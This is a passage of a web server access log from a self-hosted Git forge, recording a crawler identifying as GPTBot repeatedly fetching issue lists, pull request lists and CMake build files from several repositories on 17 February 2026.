git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:18:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:18:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11040] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" -[17/Feb/2026:18:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11610] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeSystem.cmake" [Client 74.7.227.38] [Length 25479] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10778] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:44 +0000] - 200 200 - GET https 